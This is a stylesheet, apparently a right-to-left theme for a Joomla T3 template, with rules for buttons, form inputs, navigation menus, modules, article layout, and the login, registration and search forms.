.btn-inverse[disabled]:focus,
fieldset[disabled] .btn-inverse:focus,
.btn-inverse.disabled.focus,
.btn-inverse[disabled].focus,
fieldset[disabled] .btn-inverse.focus {
  background-color: #444444;
  border-color: #373737;
}
.btn-inverse .badge {
  color: #444444;
  background-color: #ffffff;
}
.btn-block + .btn-block {
  margin-top: 5px;
}
.btn-actions .btn-lg {
  font-size: 18px;
  padding: 10px 20px;
  border-radius: 20px;
}
.btn-actions .btn + .btn {
  margin-right: 20px;
}
@media screen and (min-width: 768px) {
  .btn-actions .btn-lg {
    font-size: 24px;
    padding: 10px 30px;
    border-radius: 30px;
  }
}
select::-moz-placeholder,
textarea::-moz-placeholder,
input[type="text"]::-moz-placeholder,
input[type="password"]::-moz-placeholder,
input[type="datetime"]::-moz-placeholder,
input[type="datetime-local"]::-moz-placeholder,
input[type="date"]::-moz-placeholder,
input[type="month"]::-moz-placeholder,
input[type="time"]::-moz-placeholder,
input[type="week"]::-moz-placeholder,
input[type="number"]::-moz-placeholder,
input[type="email"]::-moz-placeholder,
input[type="url"]::-moz-placeholder,
input[type="search"]::-moz-placeholder,
input[type="tel"]::-moz-placeholder,
input[type="color"]::-moz-placeholder,
.inputbox::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
select:-ms-input-placeholder,
textarea:-ms-input-placeholder,
input[type="text"]:-ms-input-placeholder,
input[type="password"]:-ms-input-placeholder,
input[type="datetime"]:-ms-input-placeholder,
input[type="datetime-local"]:-ms-input-placeholder,
input[type="date"]:-ms-input-placeholder,
input[type="month"]:-ms-input-placeholder,
input[type="time"]:-ms-input-placeholder,
input[type="week"]:-ms-input-placeholder,
input[type="number"]:-ms-input-placeholder,
input[type="email"]:-ms-input-placeholder,
input[type="url"]:-ms-input-placeholder,
input[type="search"]:-ms-input-placeholder,
input[type="tel"]:-ms-input-placeholder,
input[type="color"]:-ms-input-placeholder,
.inputbox:-ms-input-placeholder {
  color: #999999;
}
select::-webkit-input-placeholder,
textarea::-webkit-input-placeholder,
input[type="text"]::-webkit-input-placeholder,
input[type="password"]::-webkit-input-placeholder,
input[type="datetime"]::-webkit-input-placeholder,
input[type="datetime-local"]::-webkit-input-placeholder,
input[type="date"]::-webkit-input-placeholder,
input[type="month"]::-webkit-input-placeholder,
input[type="time"]::-webkit-input-placeholder,
input[type="week"]::-webkit-input-placeholder,
input[type="number"]::-webkit-input-placeholder,
input[type="email"]::-webkit-input-placeholder,
input[type="url"]::-webkit-input-placeholder,
input[type="search"]::-webkit-input-placeholder,
input[type="tel"]::-webkit-input-placeholder,
input[type="color"]::-webkit-input-placeholder,
.inputbox::-webkit-input-placeholder {
  color: #999999;
}
textareaselect,
textareatextarea,
textareainput[type="text"],
textareainput[type="password"],
textareainput[type="datetime"],
textareainput[type="datetime-local"],
textareainput[type="date"],
textareainput[type="month"],
textareainput[type="time"],
textareainput[type="week"],
textareainput[type="number"],
textareainput[type="email"],
textareainput[type="url"],
textareainput[type="search"],
textareainput[type="tel"],
textareainput[type="color"],
textarea.inputbox {
  height: auto;
}
@media screen and (min-width: 768px) {
  select,
  textarea,
  input[type="text"],
  input[type="password"],
  input[type="datetime"],
  input[type="datetime-local"],
  input[type="date"],
  input[type="month"],
  input[type="time"],
  input[type="week"],
  input[type="number"],
  input[type="email"],
  input[type="url"],
  input[type="search"],
  input[type="tel"],
  input[type="color"],
  .inputbox {
    width: auto;
  }
}
select,
select.form-control,
select.inputbox,
select.input {
  padding-left: 5px;
}
.input-append .active,
.input-prepend .active {
  background-color: #9bd7a8;
  border-color: #3e9b52;
}
.invalid {
  border-color: #cc0000;
}
label.invalid {
  color: #cc0000;
}
input.invalid {
  border: 1px solid #cc0000;
}

.caret {
  margin-right: 5px;
  margin-top: -2px;
}
.dropdown-menu {
  padding: 0;
  min-width: 200px;
}
.dropdown-menu .divider {
  margin: 0;
  height: 10px;
  background-color: #373737;
}
.dropdown-menu > li {
  border-top: 1px solid #515151;
}
.dropdown-menu > li:first-child {
  border-top: 0;
}
.dropdown-menu > li > a {
  padding: 10px 20px;
}
.dropdown-header {
  padding: 3px 20px;
  font-size: 14px;
}
.dropdown-header a {
  color: #999999;
}
.dropdown-submenu > a:after {
  border-right-color: #999999;
}
.dropdown-submenu:hover > a:after {
  border-right-color: #ffffff;
}
.nav > li > .separator {
  position: relative;
  display: block;
  padding: 10px 15px;
  line-height: 20px;
}
@media (min-width: 991px) {
  .nav > li > .separator {
    padding-top: 17.5px;
    padding-bottom: 17.5px;
  }
}
.nav-tabs {
  border-bottom: 1px solid #eeeeee;
}
.nav-tabs > li > a {
  padding: 10px;
  line-height: normal;
  border: 0;
  text-transform: uppercase;
}
.nav-tabs > li > a:hover {
  border: 0;
  background: transparent;
}
.nav-tabs > li.active > a {
  background: #444444;
  border: 0;
  color: #fff;
  margin-bottom: 0;
}
.nav-tabs > li.active > a,
.nav-tabs > li.active > a:hover,
.nav-tabs > li.active > a:focus {
  background: #444444;
  border: 0;
  color: #fff;
}
.tab-content {
  padding: 10px 0;
  border-top: 0;
}
.nav .caret {
  border-top-color: #0077bb;
  border-bottom-color: #0077bb;
}
.nav a:hover .caret {
  border-top-color: #00466e;
  border-bottom-color: #00466e;
}
.t3-navhelper {
  background: #eeeeee;
  color: #999999;
  padding: 5px 0;
}
.breadcrumb {
  margin-bottom: 0;
  padding-right: 0;
  padding-left: 0;
  border-radius: 0;
}
.breadcrumb > li + li:before {
  content: "/\00a0";
}
.breadcrumb > li:nth-child(2):before {
  content: "";
}
.breadcrumb > .active {
  color: #999999;
}
.breadcrumb .divider {
  display: none;
}
.pagination {
  display: block;
}
.pagination:before,
.pagination:after {
  display: table;
  content: " ";
}
.pagination:after {
  clear: both;
}
@media screen and (min-width: 768px) {
  .pagination {
    float: right;
  }
}
.pagination .pagination {
  display: inline-block;
}
.counter {
  display: inline-block;
  margin-top: 20px;
  padding: 6px 12px;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-radius: 0;
}
@media screen and (min-width: 768px) {
  .counter {
    float: left;
  }
}

.navbar-toggle {
  padding: 0;
  height: 55px;
  line-height: 55px;
  width: 55px;
  margin: 0;
  position: absolute;
  left: 0;
  top: 0;
}
.navbar-toggle:hover,
.navbar-toggle:active,
.navbar-toggle:focus {
  outline: none;
  -webkit-box-shadow: none;
  box-shadow: none;
}
@media (min-width: 991px) {
  .navbar-toggle {
    display: none;
  }
}
.navbar-nav {
  margin: 8.75px -20px;
}
@media (min-width: 991px) {
  .navbar-nav {
    margin: 0;
  }
}
.navbar-default {
  background-color: #0077bb;
  border-color: #0067a2;
}
.navbar-default .navbar-text {
  color: #bbe6ff;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > li {
    margin-right: 30px;
  }
}
.navbar-default .navbar-nav > li > a,
.navbar-default .navbar-nav > li > span {
  color: #bbe6ff;
  padding: 20px;
  text-transform: uppercase;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > li > a,
  .navbar-default .navbar-nav > li > span {
    padding: 0;
    line-height: 55px;
  }
}
.navbar-default .navbar-nav > li > a:hover,
.navbar-default .navbar-nav > li > span:hover,
.navbar-default .navbar-nav > li > a:focus,
.navbar-default .navbar-nav > li > span:focus {
  color: #ffffff;
  background-color: transparent;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > li > a:hover,
  .navbar-default .navbar-nav > li > span:hover,
  .navbar-default .navbar-nav > li > a:focus,
  .navbar-default .navbar-nav > li > span:focus {
    -webkit-box-shadow: inset 0 -2px 0 #ffffff;
    box-shadow: inset 0 -2px 0 #ffffff;
  }
}
.navbar-default .navbar-nav > .active > a,
.navbar-default .navbar-nav > .active > span,
.navbar-default .navbar-nav > .active > a:hover,
.navbar-default .navbar-nav > .active > span:hover,
.navbar-default .navbar-nav > .active > a:focus,
.navbar-default .navbar-nav > .active > span:focus {
  color: #ffffff;
  background-color: transparent;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > .active > a,
  .navbar-default .navbar-nav > .active > span,
  .navbar-default .navbar-nav > .active > a:hover,
  .navbar-default .navbar-nav > .active > span:hover,
  .navbar-default .navbar-nav > .active > a:focus,
  .navbar-default .navbar-nav > .active > span:focus {
    -webkit-box-shadow: inset 0 -2px 0 #ffffff;
    box-shadow: inset 0 -2px 0 #ffffff;
  }
}
.navbar-default .navbar-toggle {
  border: 0;
}
.navbar-default .navbar-toggle:hover,
.navbar-default .navbar-toggle:focus {
  background: #0067a2;
  color: #ffffff;
}
.navbar-default .navbar-toggle .icon-bar,
.navbar-default .navbar-toggle .fa-bars {
  background-color: transparent;
  color: #bbe6ff;
}
.navbar-default .navbar-collapse,
.navbar-default .navbar-form {
  border-color: #0067a2;
}
.navbar-default .navbar-nav > .dropdown > a:hover .caret,
.navbar-default .navbar-nav > .dropdown > a:focus .caret {
  border-top-color: #ffffff;
  border-bottom-color: #ffffff;
}
.navbar-default .navbar-nav > .open > a,
.navbar-default .navbar-nav > .open > a:hover,
.navbar-default .navbar-nav > .open > a:focus {
  background-color: transparent;
  color: #ffffff;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > .open > a,
  .navbar-default .navbar-nav > .open > a:hover,
  .navbar-default .navbar-nav > .open > a:focus {
    -webkit-box-shadow: inset 0 -2px 0 #ffffff;
    box-shadow: inset 0 -2px 0 #ffffff;
  }
}
.navbar-default .navbar-nav > .open > a .caret,
.navbar-default .navbar-nav > .open > a:hover .caret,
.navbar-default .navbar-nav > .open > a:focus .caret {
  border-top-color: #ffffff;
  border-bottom-color: #ffffff;
}
.navbar-default .navbar-nav > .dropdown > a .caret {
  border-top-color: #bbe6ff;
  border-bottom-color: #bbe6ff;
}
@media (max-width: 991px) {
  .navbar-default .navbar-nav .open .dropdown-menu {
    background: #0067a2;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > li {
    border-top-color: #005788;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > li > a {
    color: #bbe6ff;
    padding: 20px 30px 20px 20px;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:focus {
    color: #cccccc;
    background-color: transparent;
  }
}
@media screen and (max-width: 991px) {
  .navbar-default .navbar-nav .open .level2.dropdown-menu {
    background: #005788;
    border-top: 1px solid #00466e;
    margin-top: 0;
  }
  .navbar-default .navbar-nav .open .level2.dropdown-menu > li {
    border-top-color: #00466e;
  }
  .navbar-default .navbar-nav .open .level2.dropdown-menu > li > a {
    padding-right: 40px;
  }
}
.navbar-default .navbar-link {
  color: #bbe6ff;
}
.navbar-default .navbar-link:hover {
  color: #ffffff;
}
.t3-mainnav {
  border: 0;
  border-bottom: 1px solid #0067a2;
  margin-bottom: 0;
  border-radius: 0;
}
@media (min-width: 991px) {
  .t3-mainnav > .container {
    position: relative;
  }
}
.t3-mainnav .t3-navbar {
  padding-right: 0;
  padding-left: 0;
  float: right;
}
.t3-mainnav .t3-navbar-collapse {
  margin-top: 55px;
}
@media (min-width: 991px) {
  .t3-mainnav .t3-navbar-collapse {
    display: none !important;
  }
}
.t3-mainnav .t3-navbar-collapse .navbar-nav {
  margin: 0 -20px;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav li > a .fa {
  margin-left: 5px;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav > li > a {
  border-top: 1px solid #0067a2;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav > li:first-child > a {
  border-top: 0;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav .open .dropdown-menu {
  right: -1px;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav .dropdown > a .caret {
  position: absolute;
  top: 40%;
  left: 12px;
}

.t3-module {
  background: transparent;
  color: inherit;
  margin-bottom: 20px;
}
@media screen and (min-width: 768px) {
  .t3-module {
    margin-bottom: 40px;
  }
}
.t3-module .module-inner {
  padding: 0;
}
.module-title {
  background: transparent;
  color: inherit;
  font-size: 18px;
  font-weight: bold;
  margin: 0 0 10px 0;
  padding: 0;
}
@media screen and (min-width: 768px) {
  .module-title {
    margin-bottom: 20px;
  }
}
.module-ct {
  background: transparent;
  color: inherit;
  padding: 0;
}
.module-ct:before,
.module-ct:after {
  display: table;
  content: " ";
}
.module-ct:after {
  clear: both;
}
.module-ct > ul,
.module-ct .custom > ul,
.module-ct > ol,
.module-ct .custom > ol {
  margin-right: 20px;
  padding-right: 0;
}
.module-ct > ul.unstyled,
.module-ct .custom > ul.unstyled,
.module-ct > ol.unstyled,
.module-ct .custom > ol.unstyled {
  padding-right: 0;
}
.module-ct > ul.nav,
.module-ct .custom > ul.nav,
.module-ct > ol.nav,
.module-ct .custom > ol.nav {
  padding-right: 0;
  margin-right: 0;
}
.t3-sidebar .nav > li {
  border-top: 1px solid #eeeeee;
  margin-top: 0;
}
.t3-sidebar .nav > li:first-child {
  border-top: 0;
}
.t3-sidebar .nav > li > a,
.t3-sidebar .nav > li > .separator {
  padding: 10px;
  display: block;
}
.t3-sidebar .nav > li.active.open > a {
  background-color: #0067a2;
  color: #ffffff;
}
.t3-sidebar .nav > li > a:hover,
.t3-sidebar .nav > li.open > a {
  background-color: #eeeeee;
  color: #444444;
}
.t3-sidebar .nav > li > a:hover .caret,
.t3-sidebar .nav > li.open > a .caret {
  border-bottom-color: #444444;
  border-top-color: #444444;
}
.t3-sidebar .dropdown-menu {
  margin-top: 0;
}
.t3-sidebar .nav > li.active > a .caret {
  border-top-color: #ffffff;
  border-bottom-color: #ffffff;
}
@media (max-width: 1450px) {
  .t3-sidebar.t3-sidebar-2 .dropdown-submenu.parent.open > .dropdown-menu,
  .t3-sidebar.t3-sidebar-right .dropdown-submenu.parent.open > .dropdown-menu {
    right: auto;
    left: 100%;
  }
}
#login-form input[type="text"],
#login-form input[type="password"] {
  width: 100%;
}
#login-form .input-group-addon {
  align-items: center;
  display: flex;
  width: auto;
}
#login-form ul.unstyled {
  margin: 0;
  padding: 0;
}
#login-form ul.unstyled li {
  list-style-type: none;
}
#login-form #form-login-remember label {
  font-weight: normal;
}
#login-form button[class*=plg_system_webauthn_login_button] {
  align-items: center;
  color: #000;
  display: flex;
  max-height: unset;
  gap: 4px;
  width: 100%;
}
.banneritem a {
  font-weight: bold;
}
.bannerfooter {
  border-top: 1px solid #eeeeee;
  font-size: 12px;
  padding-top: 10px;
  text-align: left;
}
.categories-module,
ul.categories-module,
.category-module,
ul.category-module {
  margin: 0;
  padding: 0;
}
.categories-module li,
ul.categories-module li,
.category-module li,
ul.category-module li {
  list-style: none;
  padding: 10px 0;
  border-top: 1px dotted #eeeeee;
}
.categories-module li:first-child,
ul.categories-module li:first-child,
.category-module li:first-child,
ul.category-module li:first-child {
  border-top: 0;
  padding-top: 0;
}
.categories-module h4,
ul.categories-module h4,
.category-module h4,
ul.category-module h4,
.categories-module .mod-articles-category-title,
ul.categories-module .mod-articles-category-title,
.category-module .mod-articles-category-title,
ul.category-module .mod-articles-category-title {
  font-size: 14px;
  font-weight: normal;
  margin: 0;
  display: block;
}
.categories-module .mod-articles-category-writtenby,
ul.categories-module .mod-articles-category-writtenby,
.category-module .mod-articles-category-writtenby,
ul.category-module .mod-articles-category-writtenby,
.categories-module .mod-articles-category-date,
ul.categories-module .mod-articles-category-date,
.category-module .mod-articles-category-date,
ul.category-module .mod-articles-category-date {
  color: #666666;
  font-size: 12px;
}
.categories-module .mod-articles-category-writtenby,
ul.categories-module .mod-articles-category-writtenby,
.category-module .mod-articles-category-writtenby,
ul.category-module .mod-articles-category-writtenby {
  font-weight: bold;
  margin-left: 10px;
}
.feed h4 {
  font-weight: bold;
}
.feed .newsfeed,
.feed ul.newsfeed {
  border-top: 1px solid #eeeeee;
}
.feed .newsfeed .feed-link,
.feed ul.newsfeed .feed-link,
.feed .newsfeed h5.feed-link,
.feed ul.newsfeed h5.feed-link {
  font-size: 14px;
  font-weight: normal;
  margin: 0;
}
.latestusers,
ul.latestusers {
  margin-right: 0;
}
.latestusers li,
ul.latestusers li {
  background: #eeeeee;
  display: inline-block;
  padding: 5px 10px;
  border-radius: 0;
}
.module-ct .whosonline {
  margin-right: 0;
}
.module-ct .whosonline > li {
  display: inline-block;
  border-radius: 0;
  background: #eeeeee;
  padding: 2px 5px;
  margin: 0 0 5px 5px;
  white-space: nowrap;
}
.stats-module dt,
.stats-module dd {
  display: inline-block;
  margin: 0;
}
.stats-module dt {
  font-weight: bold;
  width: 35%;
}
.stats-module dd {
  width: 60%;
}
.tagspopular ul {
  display: block;
  margin: 0;
  padding: 0;
  list-style: none;
  overflow: hidden;
}
.tagspopular ul > li {
  background: #eeeeee;
  border-radius: 3px;
  color: #666666;
  display: block;
  float: right;
  margin: 0 0 5px 5px;
  padding: 3px 10px;
}
.tagspopular ul > li > a {
  color: #666666;
}
.tagspopular ul > li .tag-count {
  background: transparent;
  color: #666666;
  display: inline;
  margin: 0;
  padding: 0;
}
.tagspopular ul > li:hover {
  background: #0077bb;
  color: #ffffff;
}
.tagspopular ul > li:hover a {
  color: #ffffff;
  text-decoration: none;
}
.tagspopular ul > li:hover .tag-count {
  color: #ffffff;
}
.tagspopular.tagscloud .tag {
  background: #eeeeee;
  border-radius: 5px;
  display: inline-block;
  margin-bottom: 5px;
  padding: 5px 10px;
}
.tagspopular.tagscloud .tag a {
  color: #666666;
}
.tagspopular.tagscloud .tag a:hover,
.tagspopular.tagscloud .tag a:focus,
.tagspopular.tagscloud .tag a:active {
  color: #00466e;
}
.tagssimilar ul {
  margin: 0;
  padding: 0;
  list-style: none;
}
.tagssimilar ul > li {
  border-bottom: 1px solid #eeeeee;
  padding: 8px 0;
}
.tagssimilar ul > li > a {
  color: #666666;
}
.tagssimilar ul > li > a:hover,
.tagssimilar ul > li > a:focus,
.tagssimilar ul > li > a:active {
  color: #00466e;
}
.module-ct > ul.archive-module {
  list-style: none;
  margin: 0;
  padding: 0;
}
.module-ct > ul.archive-module i {
  color: #999999;
  margin-left: 2px;
}
.module-ct > ul.archive-module li {
  border-bottom: 1px solid #eeeeee;
  padding: 7px 0;
}
.module-ct > ul.archive-module li a {
  color: #666666;
}
.module-ct > ul.archive-module li a:hover,
.module-ct > ul.archive-module li a:focus,
.module-ct > ul.archive-module li a:active {
  color: #0077bb;
}
.module-ct > ol.breadcrumb {
  padding: 6px 12px;
  margin-right: 0;
}
.newsflash img {
  width: 100%;
}

.item-page {
  margin-bottom: 40px;
}
.items-leading .leading {
  margin-bottom: 40px;
}
.items-row .item {
  margin-bottom: 40px;
}
.divider-vertical {
  margin: 20px 0 40px;
  border: 0;
  border-top: 1px solid #eeeeee;
}
.article-aside {
  color: #999999;
  font-size: 12px;
  margin-bottom: 20px;
  padding: 0;
}
.article-header + .article-aside {
  margin-top: -10px;
}
.article-header {
  display: flex;
  align-items: flex-start;
}
.article-header .label {
  border-radius: 3px;
  display: inline-block;
  line-height: 1;
  padding: 4px 6px;
}
.item-page .article-aside {
  font-size: 14px;
  margin-bottom: 40px;
}
.article-info {
  margin: 0;
  width: 85%;
}
.article-info .article-info-term {
  display: none;
}
.article-info dd {
  display: inline-block;
  margin-right: 0;
  margin-left: 10px;
  margin-bottom: 5px;
  white-space: nowrap;
}
.article-info dd strong {
  font-weight: 600;
}
.article-info dd .fa {
  margin-left: 5px;
}
.category-name {
  text-transform: capitalize;
}
.category-name .fa {
  display: none;
}
.category-name a {
  background: #0077bb;
  color: #fff;
  padding: 2px 5px;
}
.category-name a:hover,
.category-name a:focus,
.category-name a:active {
  background: #00466e;
  color: #fff;
  text-decoration: none;
}
.article-footer {
  color: #999999;
  font-size: 12px;
  margin-bottom: 20px;
}
article img,
.article-intro img {
  display: block;
  max-width: 100%;
  height: auto;
}
article img[align="right"],
.article-intro img[align="right"],
article .img-fulltext-left,
.article-intro .img-fulltext-left,
article .img-intro-left,
.article-intro .img-intro-left,
article .img_caption.left,
.article-intro .img_caption.left,
article .pull-left.item-image,
.article-intro .pull-left.item-image {
  margin-left: 20px;
  max-width: 100%;
}
@media screen and (max-width: 767px) {
  article img[align="right"],
  .article-intro img[align="right"],
  article .img-fulltext-left,
  .article-intro .img-fulltext-left,
  article .img-intro-left,
  .article-intro .img-intro-left,
  article .img_caption.left,
  .article-intro .img_caption.left,
  article .pull-left.item-image,
  .article-intro .pull-left.item-image {
    margin: 0 0 20px;
  }
}
article img[align="left"],
.article-intro img[align="left"],
article .img-fulltext-right,
.article-intro .img-fulltext-right,
article .img_caption.right,
.article-intro .img_caption.right,
article .img-intro-right,
.article-intro .img-intro-right,
article .pull-right.item-image,
.article-intro .pull-right.item-image {
  margin-right: 20px;
  max-width: 100%;
}
@media screen and (max-width: 767px) {
  article img[align="left"],
  .article-intro img[align="left"],
  article .img-fulltext-right,
  .article-intro .img-fulltext-right,
  article .img_caption.right,
  .article-intro .img_caption.right,
  article .img-intro-right,
  .article-intro .img-intro-right,
  article .pull-right.item-image,
  .article-intro .pull-right.item-image {
    margin: 0 0 20px;
  }
}
article .pull-none.item-image img,
.article-intro .pull-none.item-image img {
  width: 100%;
}
.img-intro-none,
.img-intro-left,
.img-intro-right,
.img-fulltext-none,
.img-fulltext-left,
.img-fulltext-right,
.img_caption {
  position: relative;
  margin-bottom: 20px;
  max-width: 100%;
}
.img-fulltext-left {
  float: right;
}
.img-fulltext-right {
  float: left;
}
.img_caption > img {
  margin-bottom: 1px !important;
}
.img_caption p.img_caption {
  background: #eeeeee;
  color: #666666;
  font-size: 12px;
  width: 100%;
  margin: 0;
  padding: 5px;
  text-align: center;
  clear: both;
}
.pull-right.article-image-intro {
  float: right !important;
  margin-right: 0 !important;
}
.pull-right.article-image-intro img {
  margin-right: 0 !important;
  margin-left: 20px;
}
@media screen and (max-width: 992px) {
  article img,
  .article-intro img,
  article img[align=left],
  .article-intro img[align=left],
  article img[align=right],
  .article-intro img[align=right],
  article .img_caption,
  .article-intro .img_caption,
  article .article-image-full,
  .article-intro .article-image-full,
  article .article-image-intro,
  .article-intro .article-image-intro,
  article .img-intro-none,
  .article-intro .img-intro-none,
  article .img-intro-left,
  .article-intro .img-intro-left,
  article .img-intro-right,
  .article-intro .img-intro-right,
  article .img-fulltext-none,
  .article-intro .img-fulltext-none,
  article .img-fulltext-left,
  .article-intro .img-fulltext-left,
  article .img-fulltext-right,
  .article-intro .img-fulltext-right {
    float: none !important;
    margin-right: 0;
    margin-left: 0;
    width: 100% !important;
  }
}
.item-page .tags {
  border-top: 1px solid #eeeeee;
  padding: 10px 0;
}
.item-page .tags span {
  display: inline-block;
  margin-bottom: 10px;
}
.item-page .tags a {
  background: #ffffff;
  border: 1px solid #eeeeee;
  border-radius: 3px;
  color: #666666;
  padding: 5px;
}
.item-page .tags a:hover,
.item-page .tags a:focus,
.item-page .tags a:active {
  background: #999999;
  border-color: #999999;
  color: #00466e;
}
.archive .filters {
  margin: 0 0 20px;
}
#archive-items article {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 20px;
  padding-bottom: 20px;
}
#archive-items article h2.article-title {
  font-size: 24px;
  line-height: 1.3;
}
article aside .btn-group > .dropdown-toggle,
article aside .btn-group > .dropdown-toggle:hover,
article aside .btn-group > .dropdown-toggle:active,
article aside .btn-group > .dropdown-toggle:focus {
  padding: 2px 5px;
}
article aside .btn-group > .dropdown-toggle .caret {
  margin-right: 2px;
}
.tag-category .filters {
  border-bottom: 1px solid #eeeeee;
  padding: 20px 0;
}
.tag-category .filters #filter-search {
  float: right;
}
.tag-category .filters.btn-toolbar > .btn-group {
  margin-right: 0;
}
.tag-category .thumbnails {
  list-style: none;
  margin: 0;
  padding: 0;
}
.tag-category .thumbnails li {
  background: transparent;
  border-bottom: 1px solid #eeeeee;
  padding: 10px 0;
}
.tag-category .thumbnails li > h3 {
  margin-top: 0;
}
.tag-category .com-tags-filter-field-wrap {
  display: flex;
  flex-wrap: wrap;
  justify-content: space-between;
  margin-bottom: 2rem;
}
.tag-category .com-tags-filter-field-wrap .btn-group {
  display: flex;
  margin-left: 0;
}
.readmore {
  margin-top: 20px;
}
.row-even,
.row-odd {
  padding: 5px;
  width: 99%;
  border-bottom: 1px solid #dddddd;
}
.row-odd {
  background-color: transparent;
}
.row-even {
  background-color: #f9f9f9;
}
.blog-row-rule,
.blog-item-rule {
  border: 0;
}
.row-fluid .row-reveal {
  visibility: hidden;
}
.row-fluid:hover .row-reveal {
  visibility: visible;
}
.nav-list > li.offset > a {
  padding-right: 30px;
  font-size: 12px;
}
.list-striped,
.row-striped {
  list-style: none;
  line-height: 20px;
  text-align: right;
  vertical-align: middle;
  border-top: 1px solid #dddddd;
  margin-right: 0;
  padding-right: 0;
}
.list-striped li,
.list-striped dd,
.row-striped .row,
.row-striped .row-fluid {
  border-bottom: 1px solid #dddddd;
  padding: 10px 15px;
}
.list-striped li:nth-child(odd),
.list-striped dd:nth-child(odd),
.row-striped .row:nth-child(odd),
.row-striped .row-fluid:nth-child(odd) {
  background-color: #f9f9f9;
}
.list-striped li:hover,
.list-striped dd:hover,
.row-striped .row:hover,
.row-striped .row-fluid:hover {
  background-color: #f5f5f5;
}
.row-striped .row-fluid {
  width: 97%;
}
.row-striped .row-fluid [class*="span"] {
  min-height: 10px;
}
.row-striped .row-fluid [class*="span"] {
  margin-right: 8px;
}
.row-striped .row-fluid [class*="span"]:first-child {
  margin-right: 0;
}
.list-condensed li {
  padding: 5px 10px;
}
.row-condensed .row,
.row-condensed .row-fluid {
  padding: 5px 10px;
}
.list-bordered,
.row-bordered {
  list-style: none;
  line-height: 18px;
  text-align: right;
  vertical-align: middle;
  margin-right: 0;
  border: 1px solid #dddddd;
}
.login-wrap .other-links ul {
  padding-right: 20px;
}
#jform_privacyconsent_privacy-lbl a.modal,
#jform_consentbox-lbl a.modal,
#jform_terms_terms-lbl a.modal,
#jform_profile_tos-lbl a.modal {
  display: inline-block;
  position: relative;
}
#jform_terms_terms input[type="radio"],
#jform_privacyconsent_privacy input[type="radio"],
#jform_consentbox input[type="radio"],
#jform_profile_tos input[type="radio"],
#jform_terms_terms input[type="checkbox"],
#jform_privacyconsent_privacy input[type="checkbox"],
#jform_consentbox input[type="checkbox"],
#jform_profile_tos input[type="checkbox"] {
  position: relative;
  margin: 0;
  margin-left: 5px;
  width: auto;
}
#jform_terms_terms label,
#jform_privacyconsent_privacy label,
#jform_consentbox label,
#jform_profile_tos label {
  margin-left: 10px;
  padding: 0;
}
.form-register fieldset {
  padding: 0 0 10px;
}
.form-register p {
  margin: 0 0 5px;
}
.form-register p.form-des {
  margin: 15px 0;
}
.form-register label {
  display: block;
  float: right;
  font-weight: bold;
  text-align: left;
  width: 130px;
}
.form-register .input,
.form-register .inputbox {
  margin-right: 10px;
  width: 200px;
}
.form-register .btn,
.form-register .button {
  margin-right: 140px;
}
.registration fieldset dt {
  margin-left: 5px;
}
.admintable textarea {
  max-width: 90% !important;
  resize: none;
}
.com_mailto body {
  padding: 10px;
}
.com_mailto .t3-mainbody {
  padding-top: 0;
  padding-bottom: 0;
}
.com_mailto .t3-content {
  width: auto;
}
#mailto-window {
  background: #fff;
  margin: 10px 0 20px;
  padding: 0;
  position: relative;
}
#mailto-window h2 {
  margin-top: 0;
  margin-bottom: 20px;
}
#mailtoForm .formelm {
  padding: 5px 0;
  vertical-align: middle;
  overflow: hidden;
}
#mailtoForm .formelm label {
  display: inline-block;
  float: right;
  font-weight: bold;
  vertical-align: middle;
  width: 100px;
}
#mailtoForm p {
  margin-top: 20px;
}
#mailtoForm .input,
#mailtoForm .inputbox {
  width: 65%;
}
#mailtoForm .btn,
#mailtoForm .button,
#mailtoForm button {
  margin-left: 5px;
}
.user-details {
  padding: 10px 0;
}
.user-details p {
  margin: 0 0 5px;
}
.user-details label {
  display: block;
  float: right;
  font-weight: bold;
  text-align: left;
  width: 130px;
}
.user-details .input,
.user-details .inputbox {
  margin-right: 10px;
  width: 200px;
}
.user-details .btn,
.user-details button {
  margin-right: 140px;
}
.user-details .paramlist .paramlist_key {
  padding: 0 0 5px;
  width: 130px;
}
.user-details .paramlist .paramlist_value {
  padding: 0 0 5px;
}
.user-details .user_name span {
  font-weight: bold;
  padding-right: 10px;
}
.reset .form-validate p,
.remind .form-validate p {
  background: #eeeeee;
  border: 1px solid #eeeeee;
  margin-bottom: 20px;
  padding: 10px 20px;
  border-radius: 0;
}
.reset .form-validate fieldset dl,
.remind .form-validate fieldset dl {
  margin: 0;
}
.reset .form-validate fieldset dt,
.remind .form-validate fieldset dt {
  margin: 4px 0 0 0;
}
.profile-edit input {
  position: relative;
  min-height: 1px;
  padding-left: 6px;
  padding-right: 6px;
}
@media (min-width: 768px) {
  .profile-edit input {
    float: right;
    width: 50%;
  }
}
.profile-edit select {
  position: relative;
  min-height: 1px;
  padding-left: 6px;
  padding-right: 6px;
}
@media (min-width: 768px) {
  .profile-edit select {
    float: right;
    width: 50%;
  }
}
.profile-edit select + button {
  margin-right: 5px;
}
#searchForm:before,
#searchForm:after {
  display: table;
  content: " ";
}
#searchForm:after {
  clear: both;
}
#searchForm fieldset {
  margin: 20px 0;
}
#searchForm legend {
  margin-bottom: 10px;
}
#searchForm select {
  width: auto;
  display: inline-block;
  margin-right: 5px;
  padding-right: 5px;
}
#searchForm .form-limit {
  margin-top: 20px;
}
